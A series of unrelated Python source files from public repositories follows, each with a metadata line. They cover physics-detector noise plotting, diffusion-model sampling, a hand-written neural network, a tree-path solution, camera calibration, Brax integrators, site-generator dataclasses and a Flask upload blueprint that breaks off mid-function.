print(f'Working on {f}')
rf_rms = array.array("d", [0]*16)
unix_time = ctypes.c_int()
run_num = ctypes.c_int()
file = ROOT.TFile.Open(f)
inTree = file.Get("rms_tree")
inTree.SetBranchAddress("runNumber", run_num)
inTree.SetBranchAddress("RMS_RFTrigger", rf_rms)
inTree.SetBranchAddress("unixTime", unix_time)
inTree.GetEntry(0) # there's only one entry
if run_num.value not in bad_run_list:
unixtimes.append(datetime.datetime.fromtimestamp(unix_time.value))
runnums.append(run_num.value)
for c in range(16):
rms[c].append(rf_rms[c])
file.Close()
unixtimes = np.asarray(unixtimes)
rms = np.array(list(rms.values())) # cast this into a 2D array
runnums = np.asarray(runnums)
return unixtimes, rms, runnums
def load_bad_run_list(station):
info = np.genfromtxt(f'runlogs/logs/a{station}_log.txt',
skip_header=0, delimiter='\t',
names=['run', 'user', 'reason', 'log']
)
return info['run']
get_arrays = False
if get_arrays:
stations = [1, 2, 3, 4, 5]
stations = [1]
for s in stations:
bad_runs = load_bad_run_list(s)
import glob
top_dir = '/mnt/scratch/baclark/ARA/rms/'
files = sorted(glob.glob(f'{top_dir}/*/A{s}/*.root'))
unixtimes, rms, runnums = get_unixtime_rms_arrays(bad_runs, files)
np.savez(f'a{s}_rms_vs_unixtime.npz',
unixtimes=unixtimes, rms=rms, runnums=runnums
)
plot_arrays = True
if plot_arrays:
which_chans = {
1: 5, # maybe 5?
2: 2,
3: 13, # 5 isn't bad, or 9, or 13, or 14
4: 1, # 5 isn't *horrible*, 10 not bad, 13 not bad, 14 not bad (use for now)
5: 1
}
def harvest(npz_file, chan):
file = np.load(npz_file, allow_pickle=True)
return file['unixtimes'], file['rms'][chan], file['runnums']
stations = [1, 2, 3, 4, 5]
unixtimes = {}
rms = {}
runnums = {}
masks = {}
guard_time = 1325394000 # something early
guard_time = 1513317600
guard_time_2 = 1610690400
guard_time_2 = 1642226400 # to show 2021
# guard_time_2 = 1800000000
for s in stations:
tmp_unixtimes, tmp_rms, tmp_runnums = harvest(
f'a{s}_rms_vs_unixtime.npz',
which_chans[s]
)
unixtimes[s] = tmp_unixtimes
rms[s] = tmp_rms
runnums[s] = tmp_runnums
unixtimes_utimes = np.asarray([datetime.datetime.timestamp(b) for b in tmp_unixtimes])
time_mask = unixtimes_utimes > guard_time
time_mask = np.logical_and(time_mask, unixtimes_utimes < guard_time_2)
masks[s] = time_mask
pa_data = np.genfromtxt('avgRMS_PA_SWTrigs.txt',
delimiter=' ',
names=['run', 'unixtime',
'0', '1', '2', '3', '4', '5', '6', '7',
'8', '9', '10', '11', '12', '13', '14', '15']
)
pa_unixtimes = []
for i in pa_data['unixtime']:
pa_unixtimes.append(datetime.datetime.fromtimestamp(int(i)))
pa_unixtimes = np.asarray(pa_unixtimes)
unixtimes['pa'] = pa_unixtimes
rms['pa'] = pa_data['1']
pa_unixtimes_utimes = np.asarray([datetime.datetime.timestamp(b) for b in pa_unixtimes])
time_mask = pa_unixtimes_utimes > guard_time
time_mask = np.logical_and(time_mask, pa_unixtimes_utimes < guard_time_2)
print(time_mask)
masks['pa'] = time_mask
runnums['pa'] = pa_data['run']
import itertools
markers = itertools.cycle(('o', 's', '^', 'v', '>', '<'))
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(111)
stations = [1, 2, 3, 4]
for s in stations:
the_mark = next(markers)
ax.plot(unixtimes[s][masks[s]], rms[s][masks[s]], the_mark, label=f'Station {s}', alpha=0.2)
the_mark = next(markers)
ax.plot(unixtimes['pa'][masks['pa']], rms['pa'][masks['pa']],
the_mark, label='PA & Station 5', alpha=0.2
)
leg = ax.legend(loc='upper right', ncol=2, markerscale=2.)
for l in leg.legendHandles:
# l._sizes = [30]
l.set_alpha(1)
ax.set_xlabel("Time")
ax.set_ylabel("RMS of Noise Waveforms [mV]")
ax.set_ylim([0,100])
ax=plt.gca()
# start_time = int(1513317600)
# stop_time = int(1547532000)
# ax.set_xlim([start_time, stop_time])
ax.set_xticklabels(ax.get_xticks(), rotation = 45)
import matplotlib.dates as md
xfmt = md.DateFormatter('%Y-%m')
# xfmt = md.DateFormatter('%Y')
ax.xaxis.set_major_formatter(xfmt)
plt.subplots_adjust(bottom=0.2)
fig.tight_layout()
fig.savefig("rms_vs_time.png")
# fig = plt.figure(figsize=(10, 8))
# ax = fig.add_subplot(111)
# ax.plot(runnums['pa'], unixtimes['pa'], 'o')
# ax.plot(runnums['pa'][masks['pa']], unixtimes['pa'][masks['pa']], 'o')
# import matplotlib.dates as md
# # xfmt = md.DateFormatter('%Y-%m-%d')
# xfmt = md.DateFormatter('%Y-%m')
# ax.yaxis.set_major_formatter(xfmt)
# plt.subplots_adjust(left=0.2)
# fig.tight_layout()
# fig.savefig("time_vs_runno_pa.png")
# del fig, ax
| clark2668/ara5_analysis | studies/2022.11_proposal/plot_rms/plot_rms.py | plot_rms.py | py | 5,522 | python | en | code | 0 | github-code | 90 |
2377499756 | # From https://colab.research.google.com/drive/1LouqFBIC7pnubCOl5fhnFd33-oVJao2J?usp=sharing#scrollTo=yn1KM6WQ_7Em
import torch
import numpy as np
from flows import RectifiedFlow
import torch.nn as nn
import tensorboardX
import os
from models import UNetEncoder
from guided_diffusion.unet import UNetModel
import torchvision.datasets as dsets
from torchvision import transforms
from torchvision.utils import save_image, make_grid
from utils import straightness
from dataset import CelebAHQImgDataset
import argparse
from tqdm import tqdm
from network_edm import SongUNet
from torch.nn import DataParallel
import json
from train_reverse_img_ddp import parse_config
def get_args():
parser = argparse.ArgumentParser()
parser = argparse.ArgumentParser(description='Configs')
parser.add_argument('--gpu', type=str, help='gpu index')
parser.add_argument('--dir', type=str, help='Saving directory name')
parser.add_argument('--ckpt', type=str, default = None, help='Flow network checkpoint')
parser.add_argument('--batchsize', type=int, default = 4, help='Batch size')
parser.add_argument('--res', type=int, default = 64, help='Image resolution')
parser.add_argument('--input_nc', type=int, default = 3, help='Unet num_channels')
parser.add_argument('--N', type=int, default = 20, help='Number of sampling steps')
parser.add_argument('--num_samples', type=int, default = 64, help='Number of samples to generate')
parser.add_argument('--encoder', type=str, default = None, help='Encoder ckpt')
parser.add_argument('--dataset', type=str, help='cifar10 / mnist / celebahq')
parser.add_argument('--no_scale', action='store_true', help='Store true if the model is trained on [0,1] scale')
parser.add_argument('--save_traj', action='store_true', help='Save the trajectories')
parser.add_argument('--save_z', action='store_true', help='Save zs for distillation')
parser.add_argument('--save_data', action='store_true', help='Save data')
parser.add_argument('--solver', type=str, default = 'euler', help='ODE solvers')
parser.add_argument('--config_de', type=str, default = None, help='Decoder config path, must be .json file')
parser.add_argument('--config_en', type=str, default = None, help='Encoder config path, must be .json file')
parser.add_argument('--seed', type=int, default=0, help='random seed')
parser.add_argument('--rtol', type=float, default=1e-5, help='rtol for RK45 solver')
parser.add_argument('--atol', type=float, default=1e-5, help='atol for RK45 solver')
arg = parser.parse_args()
return arg
def main(arg):
if not os.path.exists(arg.dir):
os.makedirs(arg.dir)
assert arg.config_de is not None
config = parse_config(arg.config_de)
if not os.path.exists(os.path.join(arg.dir, "samples")):
os.makedirs(os.path.join(arg.dir, "samples"))
if not os.path.exists(os.path.join(arg.dir, "zs")):
os.makedirs(os.path.join(arg.dir, "zs"))
if not os.path.exists(os.path.join(arg.dir, "trajs")):
os.makedirs(os.path.join(arg.dir, "trajs"))
if not os.path.exists(os.path.join(arg.dir, "data")):
os.makedirs(os.path.join(arg.dir, "data"))
if config['unet_type'] == 'adm':
model_class = UNetModel
elif config['unet_type'] == 'songunet':
model_class = SongUNet
# Pass the arguments in the config file to the model
flow_model = model_class(**config)
device_ids = arg.gpu.split(',')
if arg.ckpt is not None:
flow_model.load_state_dict(torch.load(arg.ckpt, map_location = "cpu"))
else:
raise NotImplementedError("Model ckpt should be provided.")
if len(device_ids) > 1:
device = torch.device(f"cuda")
print(f"Using {device_ids} GPUs!")
flow_model = DataParallel(flow_model)
else:
device = torch.device(f"cuda:{arg.gpu}")
print(f"Using GPU {arg.gpu}!")
# Print the number of parameters in the model
pytorch_total_params = sum(p.numel() for p in flow_model.parameters())
# Convert to M
pytorch_total_params = pytorch_total_params / 1000000
print(f"Total number of parameters: {pytorch_total_params}M")
flow_model = flow_model.to(device)
rectified_flow = RectifiedFlow(device, flow_model, num_steps = arg.N)
rectified_flow.model.eval()
if arg.encoder is not None:
from train_reverse_img_ddp import get_loader
config_en = parse_config(arg.config_en)
if config_en['unet_type'] == 'adm':
encoder_class = UNetModel
elif config_en['unet_type'] == 'songunet':
encoder_class = SongUNet
# Pass the arguments in the config file to the model
encoder = encoder_class(**config_en)
# encoder = SongUNet(img_resolution = arg.res, in_channels = arg.input_nc, out_channels = arg.input_nc * 2, channel_mult = [2,2,2], dropout = 0.13, num_blocks = 2, model_channels = 32)
forward_model = UNetEncoder(encoder = encoder, input_nc = arg.input_nc)
forward_model.load_state_dict(torch.load(arg.encoder, map_location = "cpu"), strict = True)
forward_model = forward_model.to(device).eval()
data_loader, _, _, _ = get_loader(arg.dataset, arg.batchsize, 1, 0)
# dataset_train = CelebAHQImgDataset(arg.res, im_dir = 'D:\datasets\CelebAMask-HQ\CelebA-HQ-img-train-64')
# dataloader_train = torch.utils.data.DataLoader(dataset_train, batch_size=arg.batchsize)
train_iter = iter(data_loader)
# Save configs as json file
config_dict = vars(arg)
with open(os.path.join(arg.dir, 'config_sampling.json'), 'w') as f:
json.dump(config_dict, f, indent = 4)
with torch.no_grad():
i = 0
epoch = arg.num_samples // arg.batchsize + 1
x0_list = []
straightness_list = []
nfes = []
z_norm_list = []
for ep in tqdm(range(epoch)):
noise = torch.randn(arg.batchsize, arg.input_nc, arg.res, arg.res).to(device)
save_image(noise, "debug1.jpg")
if arg.encoder is not None:
x, _= next(train_iter)
x = x.to(device)
# x = x[1].repeat(arg.batchsize, 1, 1, 1)
noise = noise[1].repeat(arg.batchsize, 1, 1, 1)
z, _, _ = forward_model(x, noise = noise)
else:
z = noise
# Compute the norm of z
z_norm = torch.sum(z ** 2, dim = [1,2,3]).sqrt()
z_norm_list.append(z_norm)
save_image(z, "debug2.jpg")
if arg.solver in ['euler', 'heun']:
traj_uncond, traj_uncond_x0 = rectified_flow.sample_ode_generative(z1=z, N=arg.N, use_tqdm = False, solver = arg.solver)
x0 = traj_uncond[-1]
uncond_straightness = straightness(traj_uncond)
straightness_list.append(uncond_straightness.item())
else:
x0, nfe = rectified_flow.sample_ode_generative_bbox(z1=z, N=arg.N, use_tqdm = False, solver = arg.solver, atol = arg.atol, rtol = arg.rtol)
nfes.append(nfe)
# print(f"nfe: {nfe}")
if arg.save_traj:
if len(traj_uncond_x0) > 10:
interval = len(traj_uncond_x0) // 5
grid = torch.cat(traj_uncond_x0[::interval], dim=3)
else:
grid = torch.cat(traj_uncond_x0, dim=3) # grid.shape: (bsize, channel, H, W * N)
if len(traj_uncond_x0) == 100:
idx = [0, 5, 10, 15, 20, 35, 50, 70, 99] # For visualization, currently hard-coded
grid = torch.cat([traj_uncond_x0[i] for i in idx], dim=3)
# (batch_size, channel, H, W * N) -> (channel, H * bsize, W * N)
grid = grid.permute(1, 0, 2, 3).contiguous().view(grid.shape[1], -1, grid.shape[3])
save_image(grid * 0.5 + 0.5 if not arg.no_scale else grid, os.path.join(arg.dir, "trajs", f"{ep:05d}_traj.png"))
for idx in range(len(x0)):
save_image(x0[idx] * 0.5 + 0.5 if not arg.no_scale else x0[idx], os.path.join(arg.dir, "samples", f"{i:05d}.png"))
# Save z as npy file
if arg.save_z:
np.save(os.path.join(arg.dir, "zs", f"{i:05d}.npy"), z[idx].cpu().numpy())
if arg.save_data:
save_image(x[idx] * 0.5 + 0.5 if not arg.no_scale else x[idx], os.path.join(arg.dir, "data", f"{i:05d}.png"))
i+=1
if i >= arg.num_samples:
break
x0_list.append(x0)
straightness_mean = np.mean(straightness_list)
print(f"straightness_mean: {straightness_mean}")
nfes_mean = np.mean(nfes) if len(nfes) > 0 else arg.N
print(f"nfes_mean: {nfes_mean}")
z_norms = torch.stack(z_norm_list).view(-1)
result_dict = {"straightness_mean": straightness_mean, "z_norms": z_norms.tolist(), "nfes_mean": nfes_mean}
with open(os.path.join(arg.dir, 'result_sampling.json'), 'w') as f:
json.dump(result_dict, f, indent = 4)
if __name__ == "__main__":
arg = get_args()
os.environ["CUDA_VISIBLE_DEVICES"] = arg.gpu
torch.manual_seed(arg.seed)
print(f"seed: {arg.seed}")
main(arg) | sangyun884/fast-ode | generate.py | generate.py | py | 9,396 | python | en | code | 56 | github-code | 90 |
7482447342 | import random
import numpy as np
from TestingHelpfuncs import Helpfuncs as hf
import math
# Global variables
SIZES = [28*28, 32, 10] # Number of nodes in: [input layer, hidden layer, ... , output layer]
EPOCHS = 10
BATCH_SIZE = 16
USED_SHARE_OF_DATA = 0.1
#LEARNING_RATE = 5
END_LEARNING_RATE = 0.1
WEIGHT_BOUND = math.pow(6/(SIZES[0]+SIZES[-1]), 0.5)
BIAS_BOUND = 0
# A class representing a Neural Network
class Network:
def __init__(self):
self.sizes = SIZES
self.L = len(self.sizes)
# Initialize weights and biases
self.weights = []
self.biases = []
self.initialLR = 0
self.lr = 0
self.dr = 0
self.sc = ""
self.correct = 0
self.used = 0
self.lossFuncValues = []
for i in range(0,self.L-1):
self.weights.append(np.random.uniform(low=-WEIGHT_BOUND, high=WEIGHT_BOUND, size=(self.sizes[i+1],self.sizes[i])))
self.biases.append(np.random.uniform(low=-BIAS_BOUND, high=BIAS_BOUND, size=(self.sizes[i+1])))
# Calculates values of each node in next layer.
def nextLayer(self, a, layer):
b = self.biases[layer]
w = self.weights[layer]
#a1 = hf.sigmoid(np.matmul(w, a) + b)
a1 = hf.relu(np.matmul(w, a) + b)
return a1
# Loops through all the layers and creates a prediction
def predict(self, image):
a = hf.flatten(image)
for l in range(0,self.L-1):
a = self.nextLayer(a, l)
return a
# Trains the NN
def train(self, train_X, train_y, test_X, test_y, steppingSched = "No stepping scheme", learningRate = 1, decayRate = 0):
self.lr = learningRate
self.dr = decayRate
self.sc = steppingSched
self.initialLR = learningRate
if steppingSched == "ADAM":
print("----------------------------------------")
print("SGD-ADAM", ", Alpha = ", self.lr)
print("----------------------------------------")
trainAccVec, trainLossVec, testAccVec, testLossVec = self.SGDADAM(train_X, train_y, test_X, test_y)
else:
print("----------------------------------------")
print("SGD, Stepping scheme = ",self.sc, ", Learning rate = ", self.lr, ", Decay rate = ", self.dr)
print("----------------------------------------")
trainAccVec, trainLossVec, testAccVec, testLossVec = self.SGD(train_X, train_y, test_X, test_y)
return trainAccVec, trainLossVec, testAccVec, testLossVec
# Updates the learning rate according to a stepping schedule
def updateLearningRate(self, epoch):
if self.sc == "exponentialDecay":
self.lr = hf.exponentialDecay(self.initialLR, self.dr, epoch)
elif self.sc == "polynomialDecay":
self.lr = hf.polynomialDecay(self.initialLR, END_LEARNING_RATE, epoch, EPOCHS)
elif self.sc == "inverseTimeDecay":
self.lr = hf.inverseTimeDecay(self.initialLR, self.dr, epoch)
elif self.sc == "piecewiseConstantDecay":
self.lr = hf.piecewiseConstantDecay(self.initialLR, epoch)
else:
pass
# Calculates the gradient of loss function based on all weights and biases
def stochasticGradient(self, train_X, train_y, trainLossVec):
changeWeights = [0]*(self.L-1)
changeBiases = [0]*(self.L-1)
lossFuncSum = 0
for i in range(0, BATCH_SIZE):
aVec = []
DVec = []
deltaVec = []
k = random.randint(0,len(train_X)-1)
xk = train_X[k]
yk = train_y[k]
a = hf.flatten(xk)
aVec.append(a)
# Performs back-propagation for all layers
for l in range(0,self.L-1):
z = np.matmul(self.weights[l],a)+self.biases[l]
a = hf.relu(z)
D = np.diag(hf.reluPrim(z))
#a = hf.sigmoid(z)
#D = np.diag(hf.sigmoidPrim(z))
aVec.append(a)
DVec.append(D)
delta_L = np.matmul(DVec[-1],(a-hf.formatY(yk)))
deltaVec.append(delta_L)
for l in reversed(range(-self.L+1, -1)):
delta_l = np.matmul(DVec[l], np.matmul(np.transpose(self.weights[l+1]), deltaVec[l+1]))
deltaVec.insert(0, delta_l)
for l in reversed(range( -self.L+1, 0)):
changeBiases[l] += deltaVec[l]
changeWeights[l] += np.outer(deltaVec[l], aVec[l-1])
prediction = max(aVec[-1])
index = aVec[-1].index(prediction)
if (index == int(yk)):
self.correct += 1
lossFuncSum += hf.lossFunc(aVec[-1], yk)
trainLossVec.append(lossFuncSum/BATCH_SIZE)
# Calculates average values
dw = [cw/BATCH_SIZE for cw in changeWeights]
db = [cb/BATCH_SIZE for cb in changeBiases]
return dw, db
# Trains the network based on Stochastic Gradient Descent
def SGD(self, train_X, train_y, test_X, test_y):
trainLossVec = []
testAccVec = []
testLossVec = []
trainAccVec = []
# Epoch loop
for i in range(1,EPOCHS+1):
self.correct = 0
self.used = 0
# Batch loop
for j in range(1, int(len(train_X)*USED_SHARE_OF_DATA/BATCH_SIZE)+1):
dw, db = self.stochasticGradient(train_X, train_y, trainLossVec)
self.used += BATCH_SIZE
"""print("\n", self.weights[1][5][5], "\n")
input()"""
# Layer loop
for l in range(1, self.L):
self.weights[l-1] -= self.lr*dw[l-1]
self.biases[l-1] -= self.lr*db[l-1]
hf.progress_bar(j, int(len(train_X)*USED_SHARE_OF_DATA/BATCH_SIZE), EPOCHS, i, round(100*self.correct/(self.used), 4))
testAcc, testLoss = hf.test(self, 50, test_X, test_y)
testAccVec.append(testAcc)
testLossVec.append(testLoss)
trainAcc = self.correct/self.used
trainAccVec.append(trainAcc)
self.updateLearningRate(i)
#loss = hf.averageLoss(self.lossFuncValues)
return trainAccVec, trainLossVec, testAccVec, testLossVec
# Trains the network based on ADAM
def SGDADAM(self, train_X, train_y, test_X, test_y):
trainLossVec = []
testAccVec = []
testLossVec = []
trainAccVec = []
beta1 = 0.9
beta2 = 0.999
epsilon = 1e-8
alpha = self.lr
t = 1
Vdw = [0]*(self.L-1)
Sdw = [0]*(self.L-1)
Vdb = [0]*(self.L-1)
Sdb = [0]*(self.L-1)
# Epoch loop
for i in range(1, EPOCHS+1):
self.correct = 0
self.used = 0
# Minibatch loop
for j in range(1, int(len(train_X)*USED_SHARE_OF_DATA/BATCH_SIZE+1)):
dw, db = self.stochasticGradient(train_X, train_y, trainLossVec)
self.used += BATCH_SIZE
"""print("\n", self.weights[1][5][5], "\n")
input()"""
# Layer loop
for l in range(1, self.L):
# Update first and second moments
Vdw[l-1] = beta1*Vdw[l-1] + (1-beta1)*dw[l-1]
Vdb[l-1] = beta1*Vdb[l-1] + (1-beta1)*db[l-1]
Sdw[l-1] = beta2*Sdw[l-1] + (1-beta2)*(np.square(dw[l-1]))
Sdb[l-1] = beta2*Sdb[l-1] + (1-beta2)*(np.square(db[l-1]))
# Get corrected values
Vdwcor = Vdw[l-1]/(1-beta1**t)
Vdbcor = Vdb[l-1]/(1-beta1**t)
Sdwcor = Sdw[l-1]/(1-beta2**t)
Sdbcor = Sdb[l-1]/(1-beta2**t)
# Update weights and biases
cw = np.divide(Vdwcor, np.sqrt(Sdwcor)+epsilon)
cb = np.divide(Vdbcor, np.sqrt(Sdbcor)+epsilon)
self.weights[l-1] -= alpha*cw
self.biases[l-1] -= alpha*cb
t += 1
#hf.progress_bar(j, int(len(train_X)*USED_SHARE_OF_DATA/BATCH_SIZE), EPOCHS, i, round(100*self.correct/(self.used), 2))
testAcc, testLoss = hf.test(self, 10000, test_X, test_y)
trainAcc = self.correct/self.used
trainAccVec.append(trainAcc)
testAccVec.append(testAcc)
testLossVec.append(testLoss)
#loss = hf.averageLoss(self.lossFuncValues)
return trainAccVec, trainLossVec, testAccVec, testLossVec | axeboii/Neural-Network | Visualisation/TestingNetwork.py | TestingNetwork.py | py | 8,902 | python | en | code | 0 | github-code | 90 |
22206990858 | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def binaryTreePaths(self, root):
"""
:type root: TreeNode
:rtype: List[str]
"""
res, path_list = [], []
self.dfs(root, path_list, res)
return res
def dfs(self, root, path_list, res):
if not root:
return
path_list.append(str(root.val))
if not root.left and not root.right:
res.append('->'.join(path_list))
if root.left:
self.dfs(root.left, path_list, res)
if root.right:
self.dfs(root.right, path_list, res)
path_list.pop()
| Eurus-Holmes/LCED | Binary Tree Paths.py | Binary Tree Paths.py | py | 797 | python | en | code | 11 | github-code | 90 |
29826894599 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
#importing the dataset
dataset = pd.read_csv('NFLX.csv')
X = dataset.iloc[:,2:3].values
y = dataset.iloc[:,3].values
#Fitting the decision tree Regression to the dataset
from sklearn.tree import DecisionTreeRegressor
regressor = DecisionTreeRegressor(random_state=0)
regressor.fit(X,y)
y_pred = regressor.predict([[300]])
#Visualising the graph
X_grid = np.arange(min(X),max(X),0.01) #Return evenly spaced values within a given interva
X_grid = X_grid.reshape((len(X_grid),1))
# we need to minimise the step size so we use minimum range and maximum range of X with stepsize of 0.1
#we reshape X_grid into a matrix where number of lines is the number of element of x_grid i.e. len(X_grid) and number of column which is 1
plt.scatter(X,y,color='red')
plt.plot(X_grid,regressor.predict(X_grid),color='blue')
plt.title('Stock prediction(Decison tree)')
plt.xlabel('High')
plt.ylabel('Low')
plt.show()
| sumit-mandal/Stock_price_Using_LINEARREGRESSIONMODELS | Decision_tree_without_testset.py | Decision_tree_without_testset.py | py | 975 | python | en | code | 0 | github-code | 90 |
29423098624 | import cv2
import numpy as np
import matplotlib.pyplot as plt
# kryternia przetwania obliczen (blad+liczba iteracji)
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)
#przygotowanie punktow 2D w postaci: (0, 0, 0), (1, 0, 0), (2, 0, 0)...., (6, 7, 0)
objp = np.zeros((6 * 7, 3), np.float32)
objp[:, :2] = np.mgrid[0:7, 0:6].T.reshape(-1, 2)
# tablice do przechowywania punktow obiektow (3D) i punktow na obrazie (2D)dla wszystkich obrazow
objpoints = [] # punkty 3d w przestrzeni (rzeczywsite)
imgpoints = [] # punkty 2d w plaszczyznie obrazu.
for i in range(1,13):
# wczytanie obrazu
img = cv2.imread('images_left/left%02d.jpg' % i)
# konwersja do odcieni szarosci
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# wyszukiwanie naroznikow na planszy
ret, corners = cv2.findChessboardCorners(gray, (7, 6), None)
# jesli znaleniono na obrazie punkty
if ret == True:
#dolaczenie wspolrzednych 3D
objpoints.append(objp)
# poprawa lokalizacji punktow (podpiskelowo)
corners2 = cv2.cornerSubPix(gray, corners, (11, 11), (-1, -1), criteria)
# dolaczenie poprawionych punktow
imgpoints.append(corners2)
# wizualizacja wykrytych naroznikow
cv2.drawChessboardCorners(img, (7, 6), corners2, ret)
cv2.imshow("Corners", img)
cv2.waitKey(0)
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints,gray.shape[::-1], None, None)
# print(ret)
# print()
# print(mtx)
# print()
# print(dist)
# print()
# print(rvecs)
# print()
# print(tvecs)
#Poprawa wyznaczonej macierzy obrazu
h, w = img.shape[:2] # (w,h) – to szerokóśc i wysokośc obrazu
alpha = 1 # oznacza, ̇ze wszystkie piksele w nowym obrazie s ̨apoprawne, a 1, ̇ze wszystkie ze starego zachowane /taka sama rozdzielczo ́s ́c/).
newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (w,h), alpha, (w,h))
# Korekcja1
dst = cv2.undistort(img, mtx, dist, None, newcameramtx)
# Korekcja2
#mapx, mapy = cv2.initUndistortRectifyMap(mtx, dist, None, newcameramtx,(w,h), 5)
#dst = cv2.remap(img, mapx, mapy, cv2.INTER_LINEAR)
#Wycięcei ROI
x, y, w, h = roi
dst = dst[y:y+h, x:x+w]
cv2.imwrite('calibresult1.png', dst)
| Maveric4/ZAW | lab5_Stereo_vision/cam_cal.py | cam_cal.py | py | 2,222 | python | pl | code | 0 | github-code | 90 |
69998658536 | from brax import jumpy as jp
from brax import math
from brax import pytree
from brax.physics import config_pb2
from brax.physics.base import P, QP, vec_to_arr
@pytree.register
class Euler:
"""Symplectic euler integration."""
def __init__(self, config: config_pb2.Config):
"""Creates a Euler integrator.
Args:
config: brax config
"""
self.pos_mask = 1. * jp.logical_not(
jp.array([vec_to_arr(b.frozen.position) for b in config.bodies]))
self.rot_mask = 1. * jp.logical_not(
jp.array([vec_to_arr(b.frozen.rotation) for b in config.bodies]))
self.dt = config.dt / config.substeps
self.gravity = vec_to_arr(config.gravity)
self.velocity_damping = config.velocity_damping
self.angular_damping = config.angular_damping
def kinetic(self, qp: QP) -> QP:
"""Performs a kinetic integration step.
Args:
qp: State data to be integrated
Returns:
State data advanced by one kinematic integration step.
"""
@jp.vmap
def op(qp, pos_mask, rot_mask) -> QP:
pos = qp.pos + qp.vel * self.dt * pos_mask
rot_at_ang_quat = math.ang_to_quat(qp.ang * rot_mask) * 0.5 * self.dt
rot = qp.rot + math.quat_mul(rot_at_ang_quat, qp.rot)
rot = rot / jp.norm(rot)
return QP(pos, rot, qp.vel, qp.ang)
return op(qp, self.pos_mask, self.rot_mask)
def potential(self, qp: QP, dp: P) -> QP:
"""Performs a potential integration step.
Args:
qp: State data to be integrated
dp: Impulses to apply during this potential step
Returns:
State data advanced by one potential integration step.
"""
@jp.vmap
def op(qp, dp, pos_mask, rot_mask) -> QP:
vel = jp.exp(self.velocity_damping * self.dt) * qp.vel
vel += (dp.vel + self.gravity) * self.dt
vel *= pos_mask
ang = jp.exp(self.angular_damping * self.dt) * qp.ang
ang += dp.ang * self.dt
ang *= rot_mask
return QP(pos=qp.pos, rot=qp.rot, vel=vel, ang=ang)
return op(qp, dp, self.pos_mask, self.rot_mask)
def potential_collision(self, qp: QP, dp: P) -> QP:
"""Performs a potential collision integration step.
Args:
qp: State data to be integrated
dp: Velocity-level collision updates to apply this integration step
Returns:
State data advanced by one velocity-level update.
"""
@jp.vmap
def op(qp, dp, pos_mask, rot_mask) -> QP:
vel = (qp.vel + dp.vel) * pos_mask
ang = (qp.ang + dp.ang) * rot_mask
return QP(pos=qp.pos, rot=qp.rot, vel=vel, ang=ang)
return op(qp, dp, self.pos_mask, self.rot_mask)
| belinghy/BraxPlayground | brax/physics/integrators.py | integrators.py | py | 2,607 | python | en | code | 1 | github-code | 90 |
5742194794 | from dataclasses import asdict, dataclass, field
from datetime import datetime, timezone
from urllib.parse import urljoin
from config import Config
@dataclass
class MarkdownPage():
template: str
content: str
summary: str
title: str | None
date: datetime
keywords: str | None
slug: str | None
toc: list
category: str | None
hide_toc: bool
@dataclass
class LinkInfo:
url: str
title: str
@dataclass
class Navigation:
path: str
older_link: LinkInfo | None = None
newer_link: LinkInfo | None = None
@property
def url(self):
return f'/{self.path}'
@dataclass
class Post:
markdown_page: MarkdownPage
navigation: Navigation
@property
def as_view_context(self):
d = asdict(self.markdown_page)
d.update(asdict(self.navigation))
d['url'] = self.navigation.url
return d
@dataclass
class SiteMapRecord:
relative_path: str
updated_at: datetime
priority: float = 1.0
@property
def lastmod(self):
return self.updated_at.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
def loc(self, config: Config):
if self.relative_path is None or self.relative_path == "":
return config.base_url
else:
return urljoin(config.base_url, str(self.relative_path))
@dataclass
class SiteMapData:
records: list[SiteMapRecord] = field(default_factory=list)
| amirkarimi/amirkarimi.github.io | models.py | models.py | py | 1,446 | python | en | code | 4 | github-code | 90 |
13778661258 | import os
from config import ADMINS
from flask import Flask, request, render_template, redirect, url_for,Blueprint,g,current_app,send_from_directory
from werkzeug.utils import secure_filename
from pyexcel_xls import XLBook
from .forms import UploadForm,SendEmailsForm
from ..models import Topic, User, Format, Content,Role_menu, Menu,Event,EventAttender
from app import db
import xlrd, re,random
from werkzeug.security import generate_password_hash
from ..emails import send_email
from flask.ext.login import login_user, logout_user, current_user, login_required
import urllib
import urllib.request
import requests
upload = Blueprint('upload', __name__)
full_name = ''
status = ''
menu_categories = list()
UPLOAD_FOLDER = 'uploads/'
@upload.route('/upload_file', methods=['GET', 'POST'])
@login_required
def upload_file():
# full_name = g.user.full_name
# status = g.user.status
# menus = menus_of_role()
form = UploadForm()
if form.validate_on_submit():
filename = secure_filename(form.upload.data.filename)
fpath = UPLOAD_FOLDER + filename
form.upload.data.save(fpath)
value = form.choice_switcher.data
if value == 'user':
input_user_xls(fpath)
elif filename == 'topic':
input_topic_xls(fpath)
message=" import successfully"
else:
filename = None
message=" import failed"
return render_template('upload/upload.html', form=form, filename=filename,message=message,full_name=full_name, menu_categories=menu_categories, status=status)
@upload.route('/send_emails', methods=['GET', 'POST'])
@login_required
def send_emails():
# full_name = g.user.full_name
# status = g.user.status
user_id = g.user.user_id
# menus = menus_of_role()
form = SendEmailsForm()
form.set_options()
if form.validate_on_submit():
filename = secure_filename(form.upload.data.filename)
fpath = UPLOAD_FOLDER + filename
event_id = form.event_id.data
event = db.session.query(Event).filter(Event.event_id == event_id).first()
template = event.email_template
form.upload.data.save(fpath)
send_email_to_user(fpath, template, event_id)
message=" import successfully"
else:
filename = None
message=" import failed"
return render_template('upload/send_emails.html', form=form, filename=filename,message=message,full_name=full_name, menu_categories=menu_categories, status=status)
@upload.route('/template')
@login_required
def download():
template_id = request.args.get('id')
file_path = os.path.join(current_app.root_path, '../templatexlsx')
if template_id == 'users':
filename = 'users_template.xlsx'
elif template_id == 'topic':
filename = 'topic_template.xlsx'
else:
filename = 'event_template.xlsx'
print(filename)
return send_from_directory(directory=file_path, filename=filename,as_attachment=True,attachment_filename=filename)
def send_email_to_user(path, template, event_id):
data = open_excel(path)
table=data.sheets()[0]
nrows=table.nrows
books=[]
accept = "accept"
reject = "reject"
for i in range(nrows):
ss=table.row_values(i)
if i == 0:
continue
email = ss[0]
